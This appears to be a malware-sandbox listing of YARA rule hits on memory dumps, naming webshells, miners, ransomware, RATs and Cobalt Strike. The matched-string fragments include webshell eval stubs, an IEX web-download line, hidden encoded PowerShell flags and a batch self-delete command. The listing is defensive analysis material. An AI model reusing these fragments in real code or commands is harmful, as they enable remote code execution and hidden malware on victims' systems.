00000026.00000003.18293544646.00000138BD8C2000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x2d9c9:$payload4: eval(gzuncompress(base64_decode 0xe9fa:$php_short: <? 0xea63:$php_short: <? 0xeacc:$php_short: <? 0xeb35:$php_short: <? 0xeb9e:$php_short: <? 0x230b3:$php_short: <? 0x3bda9:$php_short: <? 0x3fb28:$php_short: <? 0xe9fa:$php_new2: <?php 0xea63:$php_new2: <?php 0xeacc:$php_new2: <?php 0xeb35:$php_new2: <?php 0xeb9e:$php_new2: <?php
00000026.00000003.18293544646.00000138BD8C2000.00000004.00000001.sdmp	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x6e27:$x1: 78 34 4E 7A 68 63 65 44 4D 32 58 48 67 0x6e37:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x754d:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x757d:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x758d:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x7af7:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x7b07:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67
00000026.00000003.18293544646.00000138BD8C2000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x2cc88:$s1: stratum+tcp://
00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18346820069.00000138BE12C000.00000004.00000001.sdmp	webshell_asp_generic_eval_on_input	Generic ASP webshell which uses any eval/exec function directly on user input	Arnim Rupp	0xfc4e:$payload_and_input1: eval(request. 0xfc4c:$tagasp_short1: <%e 0xfc71:$tagasp_short2: %> 0xfc4c:$tagasp_long13: <%ev 0xa223:$jsp4: public 0xa281:$jsp4: public
00000026.00000003.18346820069.00000138BE12C000.00000004.00000001.sdmp	webshell_asp_generic	Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file	Arnim Rupp	0xfc8b:$asp_much_sus8: WebShell 0x69f8:$asp_much_sus15: AntiVirus 0x711c:$asp_much_sus15: AntiVirus 0x7f45:$asp_much_sus15: antivirus 0x8022:$asp_much_sus15: antivirus 0x8036:$asp_much_sus15: antivirus 0xd81f:$asp_much_sus15: Antivirus 0xfc67:$asp_much_sus18: "unsafe 0x10610:$asp_much_sus28: exploit 0xe44e:$asp_gen_sus11: "cmd.exe 0xf095:$asp_gen_sus11: "cmd.exe 0x102e8:$asp_gen_sus12: %comspec% 0xfcb0:$asp_gen_sus25: shell_ 0xfd73:$asp_gen_obf1: "+" 0x10188:$asp_gen_obf1: "+" 0x1018d:$asp_gen_obf1: "+" 0x10193:$asp_gen_obf1: "+" 0x1019a:$asp_gen_obf1: "+" 0x1019f:$asp_gen_obf1: "+" 0x101a4:$asp_gen_obf1: "+" 0xfc4c:$tagasp_short1: <%e
00000026.00000003.18346820069.00000138BE12C000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	SUSP_PowerShell_Caret_Obfuscation_2	Detects powershell keyword obfuscated with carets	Florian Roth	0x29df1:$r2: p^ower^shell
00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0xf8b6:$s1: stratum+tcp://
00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	APT_Backdoor_Win_GoRat_Memory	Identifies GoRat malware in memory based on strings.	FireEye	0x2ec46:$rat1: rat/modules/socks.(HTTPProxyClient).beacon 0x2eb23:$rat2: rat.(Core).generateBeacon 0x2eb40:$rat3: rat.gJitter 0x2eb4e:$rat4: rat/comms.(protectedChannel).SendCmdResponse 0x2ebb4:$rat6: rat/modules/latlisten.(latlistensrv).handleCmd 0x2ec1c:$rat8: rat/modules/netsweeper.(Pinger).listen 0x2ec46:$rat9: rat/modules/socks.(HTTPProxyClient).beacon 0x2ec74:$rat10: rat/platforms/win/dyloader.(memoryLoader).ExecutePluginFunction 0x2eafa:$winblows: rat/platforms/win.(winblows).GetStage
00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0x13bb8:$sa1: -enc 0x13bae:$sb1: -w hidden 0x13b93:$sc1: -nop 0x13ba8:$sd1: -noni 0x13b9d:$se1: -ep bypass 0x13b98:$sf1: -sta
00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	JoeSecurity_Baldr	Yara detected Baldr	Joe Security
00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	JoeSecurity_Knot	Yara detected Knot Ransomware	Joe Security
00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	JoeSecurity_Nemty	Yara detected Nemty Ransomware	Joe Security
00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	JoeSecurity_Nephilim	Yara detected Nephilim Ransomware	Joe Security
00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	xtremrat	Xtrem RAT v3.5	Jean-Philippe Teissier / @Jipe_	0xddfe:$a: XTREME 0xdf68:$a: XTREME 0xdd68:$h: Xtreme RAT
00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	hacktool_macos_keylogger_logkext	LogKext is an open source keylogger for Mac OS X, a product of FSB software.	@mimeframe	0x14fb6:$a1: logKextPassKey 0x14fe4:$b1: logKext Password: 0x14ff9:$b2: Logging controls whether the daemon is logging keystrokes (default is on). 0x14fb6:$c1: logKextPassKey
00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	webshell_php_dynamic_big	PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k	Arnim Rupp	0x1ec2f:$new_php2: <?php 0x11d64:$dynamic1: $if($ 0x1ee6b:$gen_bit_sus12: %comspec% 0x1db9f:$gen_bit_sus46: shell_ 0x3a7a:$gen_bit_sus47: Shell 0x7ea4:$gen_bit_sus47: Shell 0xfe88:$gen_bit_sus47: Shell 0x108a5:$gen_bit_sus47: Shell 0x10bbb:$gen_bit_sus47: Shell 0x10e95:$gen_bit_sus47: Shell 0x10fc9:$gen_bit_sus47: Shell 0xa22a:$gen_bit_sus50: bypass 0x11e1d:$gen_bit_sus55: e'.'l 0x1b1a0:$gen_much_sus8: WebShell 0x1b3cd:$gen_much_sus8: WebShell 0x1cc82:$gen_much_sus8: WebShell 0x1ec1a:$gen_much_sus8: Webshell 0x43d7:$gen_much_sus15: AntiVirus 0x113fd:$gen_much_sus24: exploit 0x15596:$gen_much_sus24: exploit 0x155d5:$gen_much_sus24: exploit
00000026.00000003.18329330778.00000138BCB46000.00000004.00000001.sdmp	RemCom_RemoteCommandExecution	Detects strings from RemCom tool	Florian Roth	0x34c6:$: \\.\pipe\%s%s%d
00000026.00000003.18329330778.00000138BCB46000.00000004.00000001.sdmp	JoeSecurity_RemComRemoteAdmin	Yara detected RemCom RemoteAdmin tool	Joe Security
00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	SUSP_PowerShell_Caret_Obfuscation_2	Detects powershell keyword obfuscated with carets	Florian Roth	0x44b1:$r1: p^o^w^e^r^s^h^E^L^L 0x44b1:$r2: p^o^w^e^r^s^h^E^L^L
00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x136c6:$s1: stratum+tcp:// 0x13761:$s1: stratum+tcp:// 0x138b8:$s1: stratum+tcp://
00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	MAL_unspecified_Jan18_1	Detects unspecified malware sample	Florian Roth	0x132cd:$s3: [Log Started] - [%.2d/%.2d/%d %.2d:%.2d:%.2d] 0x132a3:$s4: start /b "" cmd /c del "%%~f0"&exit /b 0x390e5:$s5: [%s] - [%.2d/%.2d/%d %.2d:%.2d:%.2d] 0x132fe:$s6: %s\%s.bat
00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	JoeSecurity_Vidar	Yara detected Vidar stealer	Joe Security
00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	JoeSecurity_ByteLocker	Yara detected ByteLocker Ransomware	Joe Security
00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	JoeSecurity_Cryptolocker	Yara detected Cryptolocker ransomware	Joe Security
00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	JoeSecurity_Artemon	Yara detected Artemon Ransomware	Joe Security
00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	JoeSecurity_lazparking	Yara detected LazParking Ransomware	Joe Security
00000026.00000003.18337788205.00000138BD0C2000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18326492976.00000138BE3E0000.00000004.00000001.sdmp	webshell_asp_generic_eval_on_input	Generic ASP webshell which uses any eval/exec function directly on user input	Arnim Rupp	0x134dd:$payload_and_input1: eval(request. 0x134c0:$tagasp_short1: <%@ 0x134db:$tagasp_short1: <%e 0x1f8fa:$tagasp_short1: <%\xCF 0x21150:$tagasp_short1: <%\xE9 0xb6b9:$tagasp_short2: %> 0x134d9:$tagasp_short2: %> 0x134ff:$tagasp_short2: %> 0x1e24e:$tagasp_short2: %> 0x2c63b:$tagasp_short2: %> 0x134db:$tagasp_long13: <%ev 0x134c0:$tagasp_long20: <%@pagelanguage="jscript 0x111e4:$jsp4: public
00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	SUSP_PowerShell_IEX_Download_Combo	Detects strings found in sample from CN group repo leak in October 2018	Florian Roth	0xba91:$x1: IEX ((new-object net.webclient).download 0xbae4:$x1: IEX ((new-object net.webclient).download 0xbb38:$x1: IEX ((new-object net.webclient).download 0xbb99:$x1: IEX ((new-object net.webclient).download
00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	webshell_php_generic	php webshell having some kind of input and some kind of payload. restricted to small files or big ones inclusing suspicious strings	Arnim Rupp	0xed56:$php_short: <? 0x1336d:$php_short: <? 0xed56:$php_new2: <?php 0xed63:$inp4: _POST[ 0xed5d:$cpayload1: eval($ 0x23174:$cpayload1: eval(" 0x23225:$cpayload1: eval(" 0x25092:$cpayload1: eval(f 0x16449:$cpayload2: exec(" 0x139f8:$gen_bit_sus1: :eval} 0xa765:$gen_bit_sus10: "cmd" 0x60d9:$gen_bit_sus12: %comspec% 0xbb74:$gen_bit_sus46: shell_ 0x1eb96:$gen_bit_sus47: Shell 0x1ebd8:$gen_bit_sus47: Shell 0x1ebf2:$gen_bit_sus47: Shell 0x1fb8d:$gen_bit_sus47: Shell 0x26a28:$gen_bit_sus47: Shell 0x2e950:$gen_bit_sus47: Shell 0x30f55:$gen_bit_sus61: /bin/sh 0x7948:$gen_bit_sus66: whoami
00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	webshell_php_generic_eval	Generic PHP webshell which uses any eval/exec function in the same line with user input	Arnim Rupp	0xed5d:$geval: eval($_POST
00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	webshell_php_dynamic_big	PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k	Arnim Rupp	0xed56:$new_php2: <?php 0x6c8b:$dynamic1: $duration($ 0x6c95:$dynamic1: $calc($ 0x6cb7:$dynamic1: $bytes($ 0x6cbe:$dynamic1: $calc($ 0x6cde:$dynamic1: $calc($ 0x7104:$dynamic1: $nick($ 0x139f8:$gen_bit_sus1: :eval} 0xa765:$gen_bit_sus10: "cmd" 0x60d9:$gen_bit_sus12: %comspec% 0xbb74:$gen_bit_sus46: shell_ 0x1eb96:$gen_bit_sus47: Shell 0x1ebd8:$gen_bit_sus47: Shell 0x1ebf2:$gen_bit_sus47: Shell 0x1fb8d:$gen_bit_sus47: Shell 0x26a28:$gen_bit_sus47: Shell 0x2e950:$gen_bit_sus47: Shell 0x30f55:$gen_bit_sus61: /bin/sh 0x7948:$gen_bit_sus66: whoami 0x61f1:$gen_much_sus25: Exploit 0x63e7:$gen_much_sus25: Exploit
00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	webshell_asp_generic_eval_on_input	Generic ASP webshell which uses any eval/exec function directly on user input	Arnim Rupp	0xed7c:$payload_and_input2: execute request( 0xed7a:$tagasp_short1: <%e 0xc158:$tagasp_short2: %> 0xed99:$tagasp_short2: %> 0xed7a:$tagasp_long12: <%ex
00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	ChinaChopper_Generic	China Chopper Webshells - PHP and ASPX	Florian Roth	0xed58:$php: php @eval($_POST[
00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	JoeSecurity_mock	Yara detected Mock Ransomware	Joe Security
00000026.00000003.18339634370.00000138BD24F000.00000004.00000001.sdmp	WScript_Shell_PowerShell_Combo	Detects malware from Middle Eastern campaign reported by Talos	Florian Roth	0x16afa:$s1: .CreateObject("WScript.Shell") 0x13125:$p1: powershell.exe 0x13c03:$p1: powershell.exe 0x16b2b:$p1: powershell.exe
00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	JoeSecurity_cerber	Yara detected Cerber ransomware	Joe Security
00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	JoeSecurity_Cryptolocker	Yara detected Cryptolocker ransomware	Joe Security
00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x32be1:$s1: stratum+tcp:// 0x32c21:$s1: stratum+tcp://
00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18338362697.00000138BCE4E000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18327500976.00000138BDB98000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0xb428:$s1: stratum+tcp:// 0xc044:$s1: stratum+tcp://
00000026.00000003.18327500976.00000138BDB98000.00000004.00000001.sdmp	JoeSecurity_Conti_ransomware	Yara detected Conti ransomware	Joe Security
00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0xfebc:$payload7: eval(base64_decode( 0x21527:$php_short: <? 0x21557:$php_short: <? 0x21c43:$php_short: <? 0x2789c:$php_short: <? 0x27d53:$php_short: <? 0x29c6f:$php_short: <? 0x2a52b:$php_short: <? 0x21527:$php_new2: <?php 0x27d53:$php_new2: <?php 0x29c6f:$php_new2: <?php 0x2a52b:$php_new2: <?php
00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	webshell_php_by_string_known_webshell	Known PHP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions.	Arnim Rupp	0x294b7:$pbs7: pwnshell 0x21527:$php_short: <? 0x21557:$php_short: <? 0x21c43:$php_short: <? 0x2789c:$php_short: <? 0x27d53:$php_short: <? 0x29c6f:$php_short: <? 0x2a52b:$php_short: <? 0x21527:$php_new2: <?php 0x27d53:$php_new2: <?php 0x29c6f:$php_new2: <?php 0x2a52b:$php_new2: <?php
00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	Oilrig_IntelSecurityManager	Detects OilRig malware	Eyal Sela	0x3715b:$one3: srvCheckresponded
00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x39a89:$s1: stratum+tcp://
00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	JoeSecurity_Winexe_tool	Yara detected Winexe tool	Joe Security
00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18303554710.00000138BE851000.00000004.00000001.sdmp	SUSP_Script_Obfuscation_Char_Concat	Detects strings found in sample from CN group repo leak in October 2018	Florian Roth	0x635f:$s1: "c" & "r" & "i" & "p" & "t"
00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x207ce:$s1: stratum+tcp://
00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	xtremrat	Xtrem RAT v3.5	Jean-Philippe Teissier / @Jipe_	0x3bfc2:$a: XTREME 0x3bfd4:$a: XTREME 0x3bfd4:$b: XTREMEBINDER
00000026.00000003.18345351380.00000138BE66C000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	SUSP_PowerShell_IEX_Download_Combo	Detects strings found in sample from CN group repo leak in October 2018	Florian Roth	0x3c932:$x1: IEX ((new-object net.webclient).download
00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x17a6e:$s1: stratum+tcp://
00000026.00000003.18345693514.00000138BE774000.00000004.00000001.sdmp	CredTheft_MSIL_ADPassHunt_2	unknown	FireEye	0x1d676:$pdb1: \ADPassHunt\ 0x1d687:$pdb2: \ADPassHunt.pdb 0x1d69b:$s1: Usage: .\ADPassHunt.exe 0x1d6b7:$s2: [ADA] Searching for accounts with msSFU30Password attribute 0x1d6f7:$s3: [ADA] Searching for accounts with userpassword attribute 0x1d734:$s4: [GPP] Searching for passwords now
00000026.00000003.18345693514.00000138BE774000.00000004.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000026.00000003.18329040392.00000138BCB04000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x32be1:$s1: stratum+tcp:// 0x32c21:$s1: stratum+tcp://
00000026.00000003.18329040392.00000138BCB04000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18415619805.00000138BD881000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x6e9c9:$payload4: eval(gzuncompress(base64_decode 0x133ca:$php_short: <? 0x1840c:$php_short: <? 0x18759:$php_short: <? 0x1dbe4:$php_short: <? 0x213bb:$php_short: <? 0x22e2d:$php_short: <? 0x4f9fa:$php_short: <? 0x4fa63:$php_short: <? 0x4facc:$php_short: <? 0x4fb35:$php_short: <? 0x4fb9e:$php_short: <? 0x640b3:$php_short: <? 0x7cda9:$php_short: <? 0x80b28:$php_short: <? 0x4f9fa:$php_new2: <?php 0x4fa63:$php_new2: <?php 0x4facc:$php_new2: <?php 0x4fb35:$php_new2: <?php 0x4fb9e:$php_new2: <?php
00000026.00000003.18415619805.00000138BD881000.00000004.00000001.sdmp	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x47e27:$x1: 78 34 4E 7A 68 63 65 44 4D 32 58 48 67 0x47e37:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x4854d:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x4857d:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x4858d:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x48af7:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x48b07:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67
00000026.00000003.18415619805.00000138BD881000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18306892097.00000138BD524000.00000004.00000001.sdmp	Oilrig_IntelSecurityManager_macro	Detects OilRig malware	Eyal Sela (slightly modified by Florian Roth)	0x5af9:$one6: Shell Environ$("COMSPEC") & " /c
00000026.00000003.18306892097.00000138BD524000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000026.00000003.18344277872.00000138BE12C000.00000004.00000001.sdmp	webshell_asp_generic_eval_on_input	Generic ASP webshell which uses any eval/exec function directly on user input	Arnim Rupp	0xfc4e:$payload_and_input1: eval(request. 0xfc4c:$tagasp_short1: <%e 0xfc71:$tagasp_short2: %> 0xfc4c:$tagasp_long13: <%ev 0xa223:$jsp4: public 0xa281:$jsp4: public
00000026.00000003.18344277872.00000138BE12C000.00000004.00000001.sdmp	webshell_asp_generic	Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file	Arnim Rupp	0xfc8b:$asp_much_sus8: WebShell 0x69f8:$asp_much_sus15: AntiVirus 0x711c:$asp_much_sus15: AntiVirus 0x7f45:$asp_much_sus15: antivirus 0x8022:$asp_much_sus15: antivirus 0x8036:$asp_much_sus15: antivirus 0xd81f:$asp_much_sus15: Antivirus 0xfc67:$asp_much_sus18: "unsafe 0x10610:$asp_much_sus28: exploit 0xe44e:$asp_gen_sus11: "cmd.exe 0xf095:$asp_gen_sus11: "cmd.exe 0x102e8:$asp_gen_sus12: %comspec% 0xfcb0:$asp_gen_sus25: shell_ 0xfd73:$asp_gen_obf1: "+" 0x10188:$asp_gen_obf1: "+" 0x1018d:$asp_gen_obf1: "+" 0x10193:$asp_gen_obf1: "+" 0x1019a:$asp_gen_obf1: "+" 0x1019f:$asp_gen_obf1: "+" 0x101a4:$asp_gen_obf1: "+" 0xfc4c:$tagasp_short1: <%e
00000026.00000003.18344277872.00000138BE12C000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	JoeSecurity_gogoogle	Yara detected GoGoogle ransomware	Joe Security
00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
00000026.00000003.18409070283.00000138BD8C1000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x2e9c9:$payload4: eval(gzuncompress(base64_decode 0xf9fa:$php_short: <? 0xfa63:$php_short: <? 0xfacc:$php_short: <? 0xfb35:$php_short: <? 0xfb9e:$php_short: <? 0x240b3:$php_short: <? 0x3cda9:$php_short: <? 0x40b28:$php_short: <? 0xf9fa:$php_new2: <?php 0xfa63:$php_new2: <?php 0xfacc:$php_new2: <?php 0xfb35:$php_new2: <?php 0xfb9e:$php_new2: <?php
00000026.00000003.18409070283.00000138BD8C1000.00000004.00000001.sdmp	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x7e27:$x1: 78 34 4E 7A 68 63 65 44 4D 32 58 48 67 0x7e37:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x854d:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x857d:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x858d:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x8af7:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x8b07:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67
00000026.00000003.18409070283.00000138BD8C1000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x1d64d:$s1: stratum+tcp://
00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18323946155.00000138BDB98000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0xb428:$s1: stratum+tcp:// 0xc044:$s1: stratum+tcp://
00000026.00000003.18323946155.00000138BDB98000.00000004.00000001.sdmp	JoeSecurity_Conti_ransomware	Yara detected Conti ransomware	Joe Security
00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x1c1ea:$s05: fce8890000006089e531d2648b52308b
00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	webshell_php_obfuscated_encoding	PHP webshell obfuscated by encoding	Arnim Rupp	0x5d58:$enc_eval1: \x65\x76\x61\x6c\x28 0x5d58:$enc_eval2: \x65\x76\x61\x6c\x28 0x49ce:$php_short: <? 0x4a59:$php_short: <? 0x4ae4:$php_short: <? 0x7ebe:$php_short: <? 0x156b6:$php_short: <? 0x2cda1:$php_short: <? 0x302ca:$php_short: <? 0x312ff:$php_short: <? 0x32aa7:$php_short: <? 0x36243:$php_short: <? 0x32aa7:$php_new2: <?php
00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	webshell_php_dynamic_big	PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k	Arnim Rupp	0x32aa7:$new_php2: <?php 0x323b2:$dynamic3: $_server[base64_decode(' 0x4e2c:$gen_bit_sus11: "cmd.exe 0x4eb8:$gen_bit_sus11: "cmd.exe 0x4fcf:$gen_bit_sus11: "cmd.exe 0x7dab:$gen_bit_sus11: "cmd.exe 0x1ed35:$gen_bit_sus47: Shell 0x2a9c3:$gen_bit_sus47: Shell 0x929d:$gen_bit_sus50: bypass 0x3220e:$gen_bit_sus50: bypass 0x32448:$gen_bit_sus59: 'cmd' 0x1dae3:$gen_bit_sus60: "execute" 0x1db1a:$gen_bit_sus60: "execute" 0x1c0ec:$gen_bit_sus62: Cyber 0x1c18c:$gen_bit_sus62: Cyber 0x30c3a:$gen_bit_sus69: $cmd 0x619e:$gen_much_sus8: Webshell 0x25860:$gen_much_sus8: Webshell 0x31279:$gen_much_sus8: WebShell 0x31515:$gen_much_sus8: Webshell 0x323f9:$gen_much_sus8: Webshell
00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	webshell_php_by_string_obfuscation	PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming	Arnim Rupp	0x5d58:$opbs77: \x65\x76\x61\x6c\x28 0x49ce:$php_short: <? 0x4a59:$php_short: <? 0x4ae4:$php_short: <? 0x7ebe:$php_short: <? 0x156b6:$php_short: <? 0x2cda1:$php_short: <? 0x302ca:$php_short: <? 0x312ff:$php_short: <? 0x32aa7:$php_short: <? 0x36243:$php_short: <? 0x32aa7:$php_new2: <?php
00000026.00000003.18417573092.00000138BD8B1000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x3e9c9:$payload4: eval(gzuncompress(base64_decode 0x1f9fa:$php_short: <? 0x1fa63:$php_short: <? 0x1facc:$php_short: <? 0x1fb35:$php_short: <? 0x1fb9e:$php_short: <? 0x340b3:$php_short: <? 0x4cda9:$php_short: <? 0x50b28:$php_short: <? 0x1f9fa:$php_new2: <?php 0x1fa63:$php_new2: <?php 0x1facc:$php_new2: <?php 0x1fb35:$php_new2: <?php 0x1fb9e:$php_new2: <?php
